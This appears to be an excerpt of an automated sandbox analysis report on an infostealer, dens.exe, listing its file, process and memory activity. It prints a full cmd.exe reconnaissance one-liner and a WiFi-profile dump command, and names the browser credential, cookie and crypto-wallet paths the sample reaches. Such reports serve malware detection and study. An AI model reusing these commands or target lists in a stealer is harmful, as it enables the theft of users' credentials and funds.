            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF62C0FD010
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C115C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF62C115C00

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txtJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txtJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txtJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txtJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txtJump to behavior
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Electrum":
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanentJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chromeJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
